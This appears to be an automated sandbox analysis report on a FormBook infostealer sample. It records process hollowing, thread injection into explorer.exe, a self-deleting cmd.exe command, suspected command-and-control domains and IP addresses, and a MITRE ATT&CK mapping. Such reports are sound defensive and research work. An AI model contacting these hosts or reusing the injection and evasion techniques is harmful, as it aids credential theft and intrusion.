Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C7C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C82990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C861A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C861A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C835A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C81DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C81DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C81DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C7B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C7B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C93D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C77D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C7C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C7C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C59100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C59100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C59100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D28D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C74120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C74120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C74120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C74120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C74120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C84D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C84D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C84D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CDA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C82ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D28ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C836CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C98EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D0FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C676E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C816E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C82AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CEFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D20EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D20EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D20EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C59240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C59240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C59240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C59240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CE4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D0B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D0B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D28A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C9927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C88E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C68A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C73A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D0FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C937F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C61B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C61B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D0D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C68794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D1138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D25BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D28B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C83B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C83B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D28F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D1131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C7F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CEFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CEFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D2070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D2070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C54F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C54F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\raserver.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.thenorthgoldline.com
Source: C:\Windows\explorer.exe | Domain query: www.cochez.club
Source: C:\Windows\explorer.exe | Domain query: www.vermogenswerte.com
Source: C:\Windows\explorer.exe | Domain query: www.aizaibali.com
Source: C:\Windows\explorer.exe | Domain query: www.extinctionbrews.com
Source: C:\Windows\explorer.exe | Network Connect: 95.215.210.10 80
Source: C:\Windows\explorer.exe | Domain query: www.boatrace-life04.net
Source: C:\Windows\explorer.exe | Network Connect: 172.104.157.41 80
Source: C:\Windows\explorer.exe | Domain query: www.cindywillardrealtor.com
Source: C:\Windows\explorer.exe | Domain query: www.wideawakemomma.com
Source: C:\Windows\explorer.exe | Domain query: www.livegaming.store
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 75.2.81.221 80
Source: C:\Windows\explorer.exe | Network Connect: 154.88.31.204 80
Source: C:\Windows\explorer.exe | Domain query: www.saludflv.info
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Section loaded: unknown target: C:\Users\user\Desktop\pMbPS8nCm1.exe protection: execute and read and write
Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\raserver.exe | Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: EB0000
Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Process created: C:\Users\user\Desktop\pMbPS8nCm1.exe 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000003.00000000.251221123.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

The matrix is listed per tactic. Digits that the original matrix attaches to a technique name are kept in parentheses.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Shared Modules (1), Scheduled Task/Job, At (Linux), At (Windows), Cron
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Privilege Escalation: Process Injection (512), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (2), Process Injection (512), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (11)
Credential Access: Input Capture (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Security Software Discovery (121), Virtualization/Sandbox Evasion (2), Process Discovery (2), Remote System Discovery (1), System Information Discovery (11)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Input Capture (1), Archive Collected Data (1), Data from Network Shared Drive, Input Capture, Keylogging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
Command and Control: Encrypted Channel (1), Ingress Tool Transfer (3), Non-Application Layer Protocol (3), Application Layer Protocol (13), Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings
Impact: Modify System Partition, Device Lockout, Delete Device Data

Behavior Graph

Behavior Graph ID: 452687; Sample: pMbPS8nCm1.exe; Start date: 22/07/2021; Architecture: WINDOWS; Score: 100

The rendered graph is not reproduced here; its process tree and node annotations follow. Numbers after a process name are the graph's count badges.

Start
  DNS/IP: www.melodezu.com; www.garimpeirastore.online; melodezu.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures
  -> pMbPS8nCm1.exe (started)
     Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
     -> pMbPS8nCm1.exe (started)
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        -> explorer.exe (injected)
           DNS/IP: cochez.club 95.215.210.10, 49734, 80, NEWIT-ASRU, Russian Federation; vermogenswerte.com 172.104.157.41, 49739, 80, LINODE-APLinodeLLCUS, United States; 14 other IPs or domains
           Signatures: System process connects to network (likely due to code injection or exploit)
           -> raserver.exe 12 (started)
              DNS/IP: www.aizaibali.com
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              -> cmd.exe 1 (started)
                 -> conhost.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
pMbPS8nCm1.exe | 27% | Virustotal | -
pMbPS8nCm1.exe | 41% | ReversingLabs | Win32.Trojan.Caynamer
pMbPS8nCm1.exe | 100% | Joe Sandbox ML | -

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
13.2.raserver.exe.302d450.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.2.pMbPS8nCm1.exe.5a0000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
2.1.pMbPS8nCm1.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.pMbPS8nCm1.exe.6f0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.2.pMbPS8nCm1.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
13.2.raserver.exe.5167960.6.unpack | 100% | Avira | TR/Patched.Ren.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
